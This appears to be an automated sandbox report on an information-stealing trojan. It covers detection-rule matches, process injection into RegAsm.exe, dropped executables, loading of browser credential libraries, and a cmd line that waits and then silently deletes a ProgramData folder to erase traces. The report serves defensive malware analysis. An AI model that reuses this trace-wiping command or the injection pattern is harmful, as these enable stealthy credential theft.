Source: 3.2.RegAsm.exe.43dcd8.2.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: CBFBKFIDHI.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ljhgfsd[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KJEHJKJEBG.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vdshfd[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/32@14/11

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C077030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

3_2_6C077030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

3_2_00411807

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\ProgramData\KJEHJKJEBG.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.2444731467.000000006C24F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2393955360.000000001A2FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2401373713.0000000020268000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.2444731467.000000006C24F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2393955360.000000001A2FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2401373713.0000000020268000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000003.00000002.2444731467.000000006C24F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2393955360.000000001A2FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2401373713.0000000020268000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.2444731467.000000006C24F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2393955360.000000001A2FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2401373713.0000000020268000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2393955360.000000001A2FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2401373713.0000000020268000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000003.00000002.2393955360.000000001A2FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2401373713.0000000020268000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2444731467.000000006C24F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2393955360.000000001A2FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2401373713.0000000020268000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.2444731467.000000006C24F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2393955360.000000001A2FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2401373713.0000000020268000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000003.00000002.2393955360.000000001A2FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2401373713.0000000020268000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: HIDAAK.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000003.00000002.2393955360.000000001A2FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2401373713.0000000020268000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000003.00000002.2393955360.000000001A2FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2401373713.0000000020268000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\CBFBKFIDHI.exe "C:\ProgramData\CBFBKFIDHI.exe"
Source: C:\ProgramData\CBFBKFIDHI.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\CBFBKFIDHI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KJEHJKJEBG.exe "C:\ProgramData\KJEHJKJEBG.exe"
Source: C:\ProgramData\KJEHJKJEBG.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\KJEHJKJEBG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\KJEHJKJEBG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAECFHJEBAAF" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\CBFBKFIDHI.exe "C:\ProgramData\CBFBKFIDHI.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KJEHJKJEBG.exe "C:\ProgramData\KJEHJKJEBG.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAECFHJEBAAF" & exit	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
